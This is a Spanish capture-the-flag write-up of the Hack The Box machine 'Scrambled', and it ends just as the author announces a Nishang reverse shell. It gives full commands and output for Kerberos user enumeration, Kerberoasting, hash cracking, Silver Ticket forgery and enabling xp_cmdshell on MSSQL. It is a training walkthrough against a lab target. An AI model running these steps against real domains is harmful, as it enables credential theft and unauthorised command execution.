This page looks best with JavaScript enabled

Hack The Box - Scrambled

 •  ✍️ sckull
featured image

Scrambled presenta información en su sitio web que nos permitió identificar unas credenciales las cuales nos ayudaron a generar un ‘Silver Ticket’ para posteriormente acceder por MSSQL. Con las credenciales dentro de una base de datos y PowerShell accedimos a un segundo usuario. Finalmente escalamos privilegios tras descubrir y analizar una aplicación de escritorio en la que explotamos una vulnerabilidad de ‘Deserialization’ en .NET con la ayuda de Ysoserial.NET.

Nombre Scrambled box_img_maker
OS

Windows

Puntos 30
Dificultad Media
IP 10.10.11.168
Maker

VbScrub
Matrix 
{
   "type":"radar",
   "data":{
      "labels":["Enumeration","Real-Life","CVE","Custom Explotation","CTF-Like"],
      "datasets":[
         {
            "label":"User Rate",  "data":[7.1, 6.5, 5.4, 4.6, 3.5],
            "backgroundColor":"rgba(75, 162, 189,0.5)",
            "borderColor":"#4ba2bd"
         },
         { 
            "label":"Maker Rate",
            "data":[0, 0, 0, 0, 0],
            "backgroundColor":"rgba(154, 204, 20,0.5)",
            "borderColor":"#9acc14"
         }
      ]
   },
    "options": {"scale": {"ticks": {"backdropColor":"rgba(0,0,0,0)"},
            "angleLines":{"color":"rgba(255, 255, 255,0.6)"},
            "gridLines":{"color":"rgba(255, 255, 255,0.6)"}
        }
    }
}

Recon

nmap

nmap muestra multiples puertos abiertos: dns (53), http (80), kerberos(88), rpc (135), ldap (139), mssql (1433), (4411) y winrm (5985).

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110

# Nmap 7.92 scan initiated Thu Jul  7 13:51:25 2022 as: nmap -p53,80,88,135,139,389,445,464,593,636,1433,3268,3269,4411,5985,9389,49673,49674,49698,59041 -sV -sC -oN nmap_scan 10.10.11.168
Nmap scan report for 10.10.11.168 (10.10.11.168)
Host is up (0.26s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Scramble Corp Intranet
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-07-07 17:51:32Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after:  2023-06-09T15:30:57
|_ssl-date: 2022-07-07T17:54:43+00:00; -1s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after:  2023-06-09T15:30:57
|_ssl-date: 2022-07-07T17:54:43+00:00; -1s from scanner time.
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2022-07-07T17:54:43+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-07-07T13:39:00
|_Not valid after:  2052-07-07T13:39:00
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-07-07T17:54:43+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after:  2023-06-09T15:30:57
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after:  2023-06-09T15:30:57
|_ssl-date: 2022-07-07T17:54:43+00:00; -1s from scanner time.
4411/tcp  open  found?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
|     SCRAMBLECORP_ORDERS_V1.0.3;
|   FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions:
|     SCRAMBLECORP_ORDERS_V1.0.3;
|_    ERROR_UNKNOWN_COMMAND;
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49698/tcp open  msrpc         Microsoft Windows RPC
59041/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4411-TCP:V=7.92%I=7%D=7/7%Time=62C71D25%P=x86_64-pc-linux-gnu%r(NUL
SF:L,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(GenericLines,1D,"SCRAMBLECO
SF:RP_ORDERS_V1\.0\.3;\r\n")%r(GetRequest,35,"SCRAMBLECORP_ORDERS_V1\.0\.3
SF:;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(HTTPOptions,35,"SCRAMBLECORP_ORDERS
SF:_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(RTSPRequest,35,"SCRAMBLECO
SF:RP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(RPCCheck,1D,"SCRA
SF:MBLECORP_ORDERS_V1\.0\.3;\r\n")%r(DNSVersionBindReqTCP,1D,"SCRAMBLECORP
SF:_ORDERS_V1\.0\.3;\r\n")%r(DNSStatusRequestTCP,1D,"SCRAMBLECORP_ORDERS_V
SF:1\.0\.3;\r\n")%r(Help,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOW
SF:N_COMMAND;\r\n")%r(SSLSessionReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n"
SF:)%r(TerminalServerCookie,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(TLSS
SF:essionReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(Kerberos,1D,"SCRAMB
SF:LECORP_ORDERS_V1\.0\.3;\r\n")%r(SMBProgNeg,1D,"SCRAMBLECORP_ORDERS_V1\.
SF:0\.3;\r\n")%r(X11Probe,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(FourOh
SF:FourRequest,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;
SF:\r\n")%r(LPDString,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_C
SF:OMMAND;\r\n")%r(LDAPSearchReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r
SF:(LDAPBindReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(SIPOptions,35,"S
SF:CRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(LANDesk-
SF:RC,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(TerminalServer,1D,"SCRAMBL
SF:ECORP_ORDERS_V1\.0\.3;\r\n")%r(NCP,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\
SF:n")%r(NotesRPC,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(JavaRMI,1D,"SC
SF:RAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(WMSRequest,1D,"SCRAMBLECORP_ORDERS_
SF:V1\.0\.3;\r\n")%r(oracle-tns,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(
SF:ms-sql-s,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(afp,1D,"SCRAMBLECORP
SF:_ORDERS_V1\.0\.3;\r\n")%r(giop,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n");
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time:
|   date: 2022-07-07T17:54:05
|_  start_date: N/A
| ms-sql-info:
|   10.10.11.168:1433:
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul  7 13:54:47 2022 -- 1 IP address (1 host up) scanned in 201.75 seconds

Kerbrute

Mientras analizamos la información del sitio web ejecutamos kerbrute para enumerar usuarios, observamos siete usuarios válidos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

 π ~/htb/scrambled ❯ /opt/kerbrute userenum -t 100 -d scrm.local --dc 10.10.11.168 xato-net-10-million-usernames-dup.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 07/15/22 - Ronnie Flathers @ropnop

2022/07/15 19:49:01 >  Using KDC(s):
2022/07/15 19:49:01 >   10.10.11.168:88

2022/07/15 19:49:06 >  [+] VALID USERNAME:    administrator@scrm.local
2022/07/15 19:49:18 >  [+] VALID USERNAME:    asmith@scrm.local
2022/07/15 19:49:34 >  [+] VALID USERNAME:    Administrator@scrm.local
2022/07/15 19:49:45 >  [+] VALID USERNAME:    jhall@scrm.local
2022/07/15 19:51:36 >  [+] VALID USERNAME:    sjenkins@scrm.local
2022/07/15 19:51:53 >  [+] VALID USERNAME:    khicks@scrm.local
2022/07/15 19:53:36 >  [+] VALID USERNAME:    Asmith@scrm.local
2022/07/15 19:56:59 >  [+] VALID USERNAME:    ASMITH@scrm.local
2022/07/15 19:57:46 >  [+] VALID USERNAME:    tstar@scrm.local
2022/07/15 20:12:51 >  Done! Tested 624370 usernames (9 valid) in 1429.221 seconds
 π ~/htb/scrambled ❯

Web Site

Los headers del sitio muestran Microsfot IIS 10.0.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

 π ~/htb/scrambled ❯ curl -sI 10.10.11.168
HTTP/1.1 200 OK
Content-Length: 2313
Content-Type: text/html
Last-Modified: Thu, 04 Nov 2021 18:13:14 GMT
Accept-Ranges: bytes
ETag: "3aed29a2a7d1d71:0"
Server: Microsoft-IIS/10.0
Date: Fri, 15 Jul 2022 23:32:34 GMT

 π ~/htb/scrambled ❯

Se presenta al sitio web como parte de una Intranet.

image

IT Services muestra distintas paginas, en esta se destaca la alerta que indica que auntenticación por NTLM está descativada.

image

Contact IT Support, muestra información de contacto, se muestran dos posibles nombres de usuarios: support y ksimpson.

image

New User Account muestra un formulario de “registro”, pero no es enviado a ninguna ruta.

image

Sales Orders App Troubleshooting, muestra una aplicación de escritorio, observamos la dirección del servidor y puerto, este ultimo está presente en nmap.

image

Password Resets, muestra información de cambio de contraseña, indica que al realizar un reset de contraseña es posible usar el usuario como contraseña.

image

Tras ejecutar nuevamente kerbrute esta vez con los dos usuarios, se muestra unicamente ksimpson como válido.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

 π ~/htb/scrambled ❯ /opt/kerbrute userenum -t 100 -d scrm.local --dc 10.10.11.168 users.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 07/15/22 - Ronnie Flathers @ropnop

2022/07/15 20:19:33 >  Using KDC(s):
2022/07/15 20:19:33 >   10.10.11.168:88

2022/07/15 20:19:33 >  [+] VALID USERNAME:    ksimpson@scrm.local
2022/07/15 20:19:33 >  Done! Tested 2 usernames (1 valid) in 0.068 seconds
 π ~/htb/scrambled ❯

User - SQLsvc

Kerberos Authentication

Tal y como lo indicaba el sitio, es posible utilizar el usuario como contraseña, en este caso observamos que el usuario ksimpson es válido en kerberos.

1
2
3
4
5
6
7

 π ~/htb/scrambled ❯ /opt/kerbrute bruteuser --dc 10.10.11.168 -d scrm.local users.txt ksimpson

[.. snip ..]

2022/07/15 20:19:46 >  [+] VALID LOGIN:    ksimpson@scrm.local:ksimpson
2022/07/15 20:19:46 >  Done! Tested 3 logins (1 successes) in 0.399 seconds
 π ~/htb/scrambled ❯

WADComs es un sitio que muestra distintos comandos para enumeración o explotación en entornos Windows segun la información que tengamos. Uno de ellos es GetUserSPNs de impacket. Sin embargo tras ejecutar el script observamos un error.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

 π ~/htb/scrambled ❯ impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -dc-ip 10.10.11.168 -request -debug
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Connecting to 10.10.11.168, port 389, SSL False
Traceback (most recent call last):
  File "/usr/share/doc/python3-impacket/examples/GetUserSPNs.py", line 510, in <module>
    executer.run()
  File "/usr/share/doc/python3-impacket/examples/GetUserSPNs.py", line 271, in run
    ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
  File "/usr/lib/python3/dist-packages/impacket/ldap/ldap.py", line 336, in login
    type3, exportedSessionKey = getNTLMSSPType3(negotiate, bytes(type2), user, password, domain, lmhash, nthash)
  File "/usr/lib/python3/dist-packages/impacket/ntlm.py", line 621, in getNTLMSSPType3
    ntlmChallenge = NTLMAuthChallenge(type2)
  File "/usr/lib/python3/dist-packages/impacket/structure.py", line 87, in __init__
    self.fromString(data)
  File "/usr/lib/python3/dist-packages/impacket/ntlm.py", line 379, in fromString
    Structure.fromString(self,data)
  File "/usr/lib/python3/dist-packages/impacket/structure.py", line 152, in fromString
    self[field[0]] = self.unpack(field[1], data[:size], dataClassOrCode = dataClassOrCode, field = field[0])
  File "/usr/lib/python3/dist-packages/impacket/structure.py", line 315, in unpack
    raise Exception("Unpacked data doesn't match constant value '%r' should be '%r'" % (data, answer))
Exception: ("Unpacked data doesn't match constant value 'b''' should be ''NTLMSSP\\x00''", 'When unpacking field \' | "NTLMSSP\x00 | b\'\'[:8]\'')
[-] ("Unpacked data doesn't match constant value 'b''' should be ''NTLMSSP\\x00''", 'When unpacking field \' | "NTLMSSP\x00 | b\'\'[:8]\'')
 π ~/htb/scrambled ❯

El error nos lleva al repositorio de impacket donde se habla que la autenticación por NTLM está desactivada (la alerta del sitio lo menciona) y es necesario utilizar autenticación por kerberos. Se menciona una solución y un pull request con la solución aplicada en tres scripts de impacket (GetADUsers.py, GetNPUsers.py, GetUserSPNs.py ver commit), hay que mencionar que la solución es presentada por el autor de la máquina.

Ticket - Kerberos

Para autenticarnos por kerberos necesitamos un ticket, solicitamos un ticket utilizando getTGT de impacket para el usuario ksimpson.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

 π ~/htb/scrambled ❯ impacket-getTGT scrm.local/ksimpson:ksimpson -dc-ip 10.10.11.168
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Saving ticket in ksimpson.ccache
 π ~/htb/scrambled ❯ file ksimpson.ccache
ksimpson.ccache: data
 π ~/htb/scrambled ❯ export KRB5CCNAME=`pwd`/ksimpson.ccache
 π ~/htb/scrambled ❯ echo $KRB5CCNAME
/home/kali/htb/scrambled/ksimpson.ccache
 π ~/htb/scrambled ❯

Clonamos el repositorio de impacket con la solución, en este caso en la rama ‘add-dc-host-option’.

1
2
3
4
5
6
7

 π ~/htb/scrambled ❯ git clone -b add-dc-host-option https://github.com/rmaksimov/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 21256, done.
remote: Total 21256 (delta 0), reused 0 (delta 0), pack-reused 21256
Receiving objects: 100% (21256/21256), 7.35 MiB | 1.12 MiB/s, done.
Resolving deltas: 100% (16226/16226), done.
 π ~/htb/scrambled ❯

Ejecutamos GetUserSPNs utilizando autenticación por kerberos, observamos el hash del usuario sqlsvc.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

 π ~/htb/scrambled ❯ impacket/examples/GetUserSPNs.py scrm.local/ksimpson -k -no-pass -request -dc-ip 10.10.11.168 -dc-host dc1.scrm.local
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName          Name    MemberOf  PasswordLastSet             LastLogon                   Delegation
----------------------------  ------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/dc1.scrm.local:1433  sqlsvc            2021-11-03 12:32:02.351452  2022-07-15 00:56:52.273402
MSSQLSvc/dc1.scrm.local       sqlsvc            2021-11-03 12:32:02.351452  2022-07-15 00:56:52.273402



$krb5tgs$23$*sqlsvc$SCRM.LOCAL$MSSQLSvc/dc1.scrm.local*$67b545c8a8b581039ec835bba9d27e5b$3b302f3739382078a3c1cf29c27b7e8a9a2a349860479344247f31be9783b9dea6f2560c1c0992f720c44dc69e7fdf0d5ed6ea6d8a38a5ac0f32d372ff168c3f00c504ccaf0224c45dc4d74481255ed9655502d820adf323a3a2b46172b68b75a0a88b7f572db286c7faa26b87176f446862eabf88d6bbe3e6ca6382c4277f1d212e7d72253964e3b9bfb14486c3015a6b5caf760cf964343c855a39ab88647cccedf71bd78718c13b6cb46a39dd6b4af69503a77b7830cd2c3bb8b7c878d802617211dc0ed5a03aed141b2a37acc31b951a446a23f2df45cf452fcb5794ca71fec3a3d3a96470ec1d1943b3ba8ebb7fffdf5abeec762c458d0f81f868e4d8d141009ab58520c28b328865ca2600984fc34590190ce08573372749e0746ce1e6b9bf015721d8570dd95718e8befbce3657fdce675371b2b6c8bd577bcb68389e43c7d317fe1194a7a8129ef20175dbf995106d5ee32db3c101adaa270b37d7b57e5b5a25be04ba4b5232f05612bedbfc48866ddcb5209d670adfc582b39bfcb707eff1a8712d907486fe858922428e433b2f62de29507c2b18c0b40a405662a1fa688bf635fae0d48302d4c8e67c45da5d9cd51ea52e4ff63e400b70e702c7aaec5a1878d498c7cbf29d404b1c648f0a4233594d1fe9c1b7270048668078e4762feccd4c24d1b41f1e281beac895c52f001ac2f98abd7da70349c77a8612d860484f9a9e9690efb359ba7ce22974651fe666d81191a6a12ca876bc7ab248a07dd8c21ea4d46f22c2649fdaad1ef1a8378937e27e824df468f97bd3f6a97cacc7354d62d4256f31234622dc6202a9a180cb7c15d480f30a622742159b833e4969d8c335f691f0087d62118200985dc0e48462a8a2656a9dbd66e4fcfc0048e5e8bd8a534dee2049204e992205b21dd7e2d92a4ece7a8c8d7713aeb0d20d4ba8821ff2a2f1dca02c70ad6d7541b03e3157b21f3cbd2606eae1d49c064b5aef928b7f561f44017162b846131abe6e47037bd2e0f438264de3a8fa2813c3c5eba5770f5bb4f31b04cd931077d07f80d7ab6b7694897aabd247bd09e7ca844ffa594d8d3def655917b311908ac40e879c876b23717c033a0613fee0d30ab354ada1e199d1912f8da9005d3c823df808664bc4a274aac0e6d1a193aabb43fc7be817bfcd61cdd929246d71e16f4b46b2fc69862c70bf0c31c51e2a4cf4f5563c3cc5e1e8ddcc7b72b6a4c4a7ef5dcedcd0cf35c41799bd70b596de5eef28b0cc5b0e1854871971fd2af1ede3ae034611c002f9bf567ebf063d3d95a87c245878aff287acde26b5a66ab28e0a53803314bc81b55032570a31b957f2867370cc79cac365e467b08bb3c7ef197e57600728b343b5a4e4158d15bd0be1e676b50f715ddc6d0e3baccee0dc8a2ffc0468737cb791084452a6763a9d66f9239ab6
 π ~/htb/scrambled ❯

Password Hash Cracking

Tras ejecutar john con el wordlist rockyou obtuvimos la contraseña.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

 π ~/htb/scrambled ❯ john --wordlist=$ROCK sqlsvc_hash
Created directory: /home/kali/.john
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Pegasus60        (?)
1g 0:00:00:05 DONE (2022-07-15 20:28) 0.1773g/s 1902Kp/s 1902Kc/s 1902KC/s Penrose..Pearce
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
 π ~/htb/scrambled ❯

Intentamos autenticarnos por kerberos por mssql solicitando un ticket pero mssql no nos permite.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

  π ~/htb/scrambled ❯ impacket-getTGT scrm.local/sqlsvc:Pegasus60 -dc-ip 10.10.11.168
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Saving ticket in sqlsvc.ccache
 π ~/htb/scrambled ❯ export KRB5CCNAME=`pwd`/sqlsvc.ccache
 π ~/htb/scrambled ❯ impacket/examples/mssqlclient.py dc1.scrm.local/sqlsvc@10.10.11.168 -k -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Encryption required, switching to TLS
[-] Kerberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)
 π ~/htb/scrambled ❯

Silver Ticket

Luego de investigar un poco más nos topamos con Silver Tickets, con la información que tenemos podemos craftear un ticket para un servicio. Para ello necesitamos obtener el NTLM hash y SID de un usuario.

Para obtener el SID, lookupsid de impacket podría ayudarnos, pero lookupsid no soporta autenticación por kerberos.

1
2
3
4
5
6
7

 π ~/htb/scrambled ❯ impacket-lookupsid scrm.lcoal/ksimpson:ksimpson@dc1.scrm.local
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Brute forcing SIDs at dc1.scrm.local
[*] StringBinding ncacn_np:dc1.scrm.local[\pipe\lsarpc]
[-] SMB SessionError: STATUS_NOT_SUPPORTED(The request is not supported.)
 π ~/htb/scrambled ❯

VbScrub en el video sobre Silver Tickets presenta GetDomainSID.exe, una herramienta para obtener los SID de un dominio, especificando las credenciales, tambien es posible obtener por medio de autenticación kerberos, se presenta el query utilizado por este programa en LDAP.

1

(&(ObjectClass=user)(objectSid=*)(!(ObjectClass=foreignSecurityPrincipal)))

Utilizando el query anterior modificamos el script GetADUsers de impacket para obtener los SID de los usuarios en el dominio.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

 π ~/htb/scrambled ❯ ./sidkerberos.py scrm.local/ksimpson -k -no-pass -dc-ip 10.10.11.168 -dc-host dc1.scrm.local -all
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Querying dc1.scrm.local for information about domain.
Name                  SID
--------------------  ------------------------------
administrator         S-1-5-21-2743207045-1827831105-2542523200-500
Guest                 S-1-5-21-2743207045-1827831105-2542523200-501
                      S-1-5-21-2743207045-1827831105-2542523200-1000
krbtgt                S-1-5-21-2743207045-1827831105-2542523200-502
tstar                 S-1-5-21-2743207045-1827831105-2542523200-1106
asmith                S-1-5-21-2743207045-1827831105-2542523200-1107
sjenkins              S-1-5-21-2743207045-1827831105-2542523200-1118
sdonington            S-1-5-21-2743207045-1827831105-2542523200-1119
                      S-1-5-21-2743207045-1827831105-2542523200-1120
backupsvc             S-1-5-21-2743207045-1827831105-2542523200-1601
jhall                 S-1-5-21-2743207045-1827831105-2542523200-1603
rsmith                S-1-5-21-2743207045-1827831105-2542523200-1604
ehooker               S-1-5-21-2743207045-1827831105-2542523200-1605
khicks                S-1-5-21-2743207045-1827831105-2542523200-1611
sqlsvc                S-1-5-21-2743207045-1827831105-2542523200-1613
miscsvc               S-1-5-21-2743207045-1827831105-2542523200-1617
ksimpson              S-1-5-21-2743207045-1827831105-2542523200-1619
 π ~/htb/scrambled ❯

Necesitamos un hash NTLM del usuario, en este caso tenemos la contraseña en texto plano de sqlsvc, con python podemos generar el hash NTLM.

1
2
3

 π ~/htb/scrambled ❯ python -c 'import hashlib,binascii; print(binascii.hexlify(hashlib.new("md4", "Pegasus60".encode("utf-16le")).digest()))'
b'b999a16500b87d17ec7f2e2a68778f05'
 π ~/htb/scrambled ❯

Con ello tenemos la información necesaria para generar nuestro ticket, utilizando ticketer de impacket generamos el ticket. Observamos que el ticket se guardó en sqlsvc.ccache.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

 π ~/htb/scrambled ❯ impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -dc-ip 10.10.11.168 -spn cifs/dc1.scrm.local sqlsvc
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/sqlsvc
[*]   PAC_LOGON_INFO
[*]   PAC_CLIENT_INFO_TYPE
[*]   EncTicketPart
[*]   EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]   PAC_SERVER_CHECKSUM
[*]   PAC_PRIVSVR_CHECKSUM
[*]   EncTicketPart
[*]   EncTGSRepPart
[*] Saving ticket in sqlsvc.ccache
 π ~/htb/scrambled ❯

MSSQL

Exportamos el path completo del ticket en la variable KRB5CCNAME, ejecutamos mssqlclient de impacket con autenticación kerberos, logramos obtener acceso.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

 π ~/htb/scrambled ❯ impacket-mssqlclient scrm.local/sqlsvc@dc1.scrm.local -no-pass -k
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> select USER;


--------------------------------------------------------------------------------------------------------------------------------

dbo

SQL>

Enumeramos las bases de datos observamos ScrambleHR, observamos en la tabla UserImport las credenciales de ldap para el usuario miscsvc.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

SQL> select name from sys.databases;
name

--------------------------------------------------------------------------------------------------------------------------------

master

tempdb

model

msdb

ScrambleHR

SQL> use ScrambleHR;
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: ScrambleHR
[*] INFO(DC1): Line 1: Changed database context to 'ScrambleHR'.
SQL> SELECT table_name FROM information_schema.tables;
table_name

--------------------------------------------------------------------------------------------------------------------------------

Employees

UserImport

Timesheets

SQL> select * from UserImport;
LdapUser                                             LdapPwd                                              LdapDomain                                           RefreshInterval   IncludeGroups

--------------------------------------------------   --------------------------------------------------   --------------------------------------------------   ---------------   -------------

MiscSvc                                              ScrambledEggs9900                                    scrm.local                                                        90               0

SQL>

Shell

Al igual que Querier - HTB activamos xp_cmdshell para la ejecución de comandos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

SQL> EXEC sp_configure 'show advanced options', 1; EXEC sp_configure reconfigure; EXEC sp_configure 'xp_cmdshell', 1;EXEC sp_configure reconfigure;
[*] INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
name                                      minimum       maximum   config_value     run_value

-----------------------------------   -----------   -----------   ------------   -----------

allow polybase export                           0             1              0             0

[.. snip ..]

user options                                    0         32767              0             0

xp_cmdshell                                     0             1              1             0

SQL>

Observamos que tenemos acceso como sqlsvc.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

SQL> EXEC master.dbo.xp_cmdshell 'whoami';
output                                                                                                                                                                                  

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

scrm\sqlsvc                                                                                                                                                                             

NULL                                                                                                                                                                                    

SQL>

Ejecutamos una shell de Nishang de powershell.

1

